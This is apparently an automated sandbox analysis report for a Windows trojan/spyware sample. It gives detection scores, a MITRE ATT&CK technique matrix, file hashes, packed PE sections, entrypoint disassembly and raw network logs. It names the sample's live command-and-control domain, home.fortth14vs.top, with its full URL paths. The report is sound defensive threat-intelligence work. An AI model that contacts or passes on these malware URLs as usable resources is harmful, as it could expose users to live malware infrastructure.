Source: global trafficTCP traffic: 192.168.2.3:49712 -> 34.147.147.173:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
XJiB3BdLTg.exe49%VirustotalBrowse
XJiB3BdLTg.exe100%AviraTR/Crypt.TPM.Gen
XJiB3BdLTg.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
34.147.147.173
truefalse
    		high
    httpbin.org
    		34.197.122.172
    		truefalse
      		high
      18.31.95.13.in-addr.arpa
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
        • Avira URL Cloud: malware
        		unknown
        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
        • Avira URL Cloud: malware
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlXJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://html4/loose.dtdXJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#XJiB3BdLTg.exefalse
                		high
                https://httpbin.org/ipbeforeXJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahXJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://curl.se/docs/http-cookies.htmlXJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/hsts.html#XJiB3BdLTg.exefalse
                      		high
                      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://curl.se/docs/alt-svc.htmlXJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://.cssXJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://.jpgXJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            34.147.147.173
                            		home.fortth14vs.topUnited States
                            		2686ATGS-MMD-ASUSfalse
                            34.197.122.172
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582830
                            Start date and time:2024-12-31 15:40:47 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 17s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:XJiB3BdLTg.exe
                            renamed because original name is a hash value
                            Original Sample Name:767f4aff1a89b1abfe6a843f7750bd5b.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@10/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.95.31.18, 172.202.163.200
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            34.147.147.173Bo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                            • home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
                            34.197.122.172yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                              ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                  Set-up.exeGet hashmaliciousUnknownBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    home.fortth14vs.topBo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
                                    r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    • 91.149.241.220
                                    yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                    • 91.149.241.220
                                    ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                    • 91.149.241.220
                                    Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                    • 91.149.241.220
                                    httpbin.orgBo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 52.202.253.164
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 52.73.63.247

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AMAZON-AESUSBo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                    • 34.200.57.114
                                    ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                    • 34.197.122.172
                                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                    • 44.221.84.105
                                    http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                    • 44.199.56.69
                                    Set-up.exeGet hashmaliciousUnknownBrowse
                                    • 52.202.253.164
                                    ATGS-MMD-ASUSBo6uO5gKL4.exeGet hashmaliciousUnknownBrowse
                                    • 34.147.147.173
                                    http://usps.com-trackaddn.top/lGet hashmaliciousUnknownBrowse
                                    • 34.54.88.138
                                    cbr.x86.elfGet hashmaliciousMiraiBrowse
                                    • 57.13.227.38
                                    https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                    • 34.36.178.232
                                    kwari.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 48.233.101.215
                                    kwari.arm.elfGet hashmaliciousUnknownBrowse
                                    • 57.204.182.195
                                    kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 57.206.149.213
                                    kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 34.31.161.194
                                    https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                    • 57.182.72.119
                                    botx.mips.elfGet hashmaliciousMiraiBrowse
                                    • 32.75.183.191

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                    Entropy (8bit):7.984843401156656
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • VXD Driver (31/22) 0.00%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:XJiB3BdLTg.exe
                                    File size:4'471'296 bytes
                                    MD5:767f4aff1a89b1abfe6a843f7750bd5b
                                    SHA1:d05134107cb88e143b16ca89cb6f3ec675d06d36
                                    SHA256:68783c123f5c9c302811fc6391329010a372fc583f5af03c4f65d0656a8a165e
                                    SHA512:1c451b2571e52210fba20615ae66b22b8e7b18ec2d8fd5b7fcb5c1c2799b0b4be9f92140c7f44a61c65f1bc511765b02161567b4d1a639cb0fc5dc71c0e8e3c9
                                    SSDEEP:98304:ellSccFHznisoBFtF4bSNj7QQGiNOWkdNoXvY1c1QVovEx+/Mx3oASj:e/GlnKq2jKGkdNaY1c1KMETaTj
                                    TLSH:B82633179F37A1D7F86DD1B2252703261873E9AA0D38DB9135908C77F2AAD251EB0C1B
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...@........M...@..........................p.......uD...@... ............................

                                    File Icon

                                    Icon Hash:90cececece8e8eb0

                                    Static PE Info

                                    General

                                    Entrypoint:0x1094000
                                    Entrypoint Section:.taggant
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                    DLL Characteristics:DYNAMIC_BASE
                                    Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Authenticode Signature

                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007F5BD0FF48CAh
                                        prefetchNTA byte ptr [eax+eax+00h]
                                        add byte ptr [eax], al
                                        add cl, ch
                                        add byte ptr [eax], ah
                                        add byte ptr [eax], al
                                        add byte ptr [0000000Ah], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], dl
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [edx], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [0200000Ah], al
                                        or al, byte ptr [eax]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [ecx], al
                                        add byte ptr [eax], 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        adc byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        or ecx, dword ptr [edx]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc92a340x10lggscavc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0xc929e40x18lggscavc
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        0x10000x74a0000x289000ee4b99a9b2b2beec1240326f9f71d697unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x74b0000x2b00x200c575cc438573d21ecac038b7736bf19bFalse0.794921875data6.029310786600082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        0x74d0000x38f0000x200a73fc2d648b5db4ca1c9e39af9ba752eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        lggscavc0xadc0000x1b70000x1b6e00db9e7ae11ed89345dd479b6dcc1ecb7bFalse0.9945723040088293data7.956092782324055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        pdskyepf0xc930000x10000x400a1435739b920aca7d779fbfa28a53670False0.7646484375data6.034974157084678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .taggant0xc940000x30000x2200d8a533a4eb757d593adac0c6bb5dd156False0.06066176470588235DOS executable (COM)0.7864552441216863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_MANIFEST0xc92a440x256ASCII text, with CRLF line terminators0.5100334448160535

                                        Imports

                                        DLLImport
                                        kernel32.dlllstrcpy

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 31, 2024 15:42:08.277951956 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.278001070 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:08.278062105 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.289216995 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.289237022 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:08.984332085 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:08.987535000 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.987562895 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:08.989168882 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:08.989233971 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.991823912 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:08.992230892 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:09.000216007 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:09.000235081 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:09.040512085 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:09.487379074 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:09.487462997 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:09.487509966 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:09.515841961 CET49711443192.168.2.334.197.122.172
                                        Dec 31, 2024 15:42:09.515867949 CET4434971134.197.122.172192.168.2.3
                                        Dec 31, 2024 15:42:11.529638052 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.534636021 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.534792900 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.555784941 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.560784101 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560807943 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560832024 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560843945 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560854912 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560867071 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560872078 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560930014 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.560956955 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560964108 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560970068 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.560975075 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.561111927 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.565850019 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565866947 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565893888 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565906048 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565928936 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565941095 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.565957069 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.565984011 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.566044092 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.566128969 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.607356071 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.607551098 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.659471989 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.660196066 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.707447052 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.707741976 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.755460024 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.755600929 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.803428888 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.803545952 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.855458975 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.855530024 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.903405905 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.903564930 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.951401949 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.951464891 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.956475973 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.956644058 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.956743002 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.961553097 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961564064 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961623907 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.961666107 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961682081 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961690903 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961704969 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961720943 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.961721897 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961733103 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961741924 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961750984 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961769104 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961774111 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.961777925 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961786985 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961796999 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961801052 CET4971280192.168.2.334.147.147.173
                                        Dec 31, 2024 15:42:11.961882114 CET804971234.147.147.173192.168.2.3
                                        Dec 31, 2024 15:42:11.961893082 CET804971234.147.147.173192.168.2.3
